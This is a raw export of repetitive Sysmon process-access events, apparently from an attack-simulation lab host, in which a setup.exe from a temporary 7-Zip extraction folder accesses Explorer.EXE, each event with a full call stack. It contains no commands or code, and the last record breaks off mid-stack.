13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|